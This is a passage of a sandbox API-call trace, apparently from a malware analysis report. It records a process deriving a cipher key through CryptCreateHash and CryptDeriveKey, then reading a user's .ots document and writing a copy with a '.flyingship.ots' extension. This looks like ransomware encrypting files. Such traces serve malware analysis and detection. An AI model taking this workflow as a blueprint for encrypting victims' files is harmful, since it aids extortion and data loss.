out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0177.557] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0177.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0177.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0177.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0177.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0177.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0177.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0177.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0177.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0177.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0177.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0177.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0177.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.557] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0177.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0177.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.557] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0177.558] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0177.558] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.559] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.559] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0177.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0177.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0177.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0177.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0177.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0177.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0177.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0177.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0177.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0177.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0177.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0177.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0177.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0177.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0177.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x9bd648, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0177.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0177.560] GetProcAddress (hModule=0x74f20000, lpProcName="CryptCreateHash") returned 0x74f2df4e [0177.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0177.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0177.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0177.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0177.561] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0177.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0177.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0177.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0177.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0177.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0177.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0177.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0177.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0177.562] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0177.562] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.562] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.562] CryptHashData (hHash=0x90af58, pbData=0x8def38, dwDataLen=0x19, dwFlags=0x1) returned 1 [0177.562] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.562] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0177.562] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.562] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0177.562] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.562] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.562] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.562] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.562] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.562] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.562] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0177.562] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.563] CryptDestroyHash (hHash=0x90af58) returned 1 [0177.563] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.563] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.563] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.563] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.563] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.564] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\b1y6nam2jhwq3mozolb.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0177.564] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.564] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0177.564] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.564] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.564] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.565] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.flyingship.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\b1y6nam2jhwq3mozolb.flyingship.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0177.566] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.566] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.566] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.566] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.567] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0177.567] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0177.570] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x7fea, lpOverlapped=0x0) returned 1 [0177.571] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0177.573] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.573] RtlAllocateHeap (HeapHandle=0x8a0000, 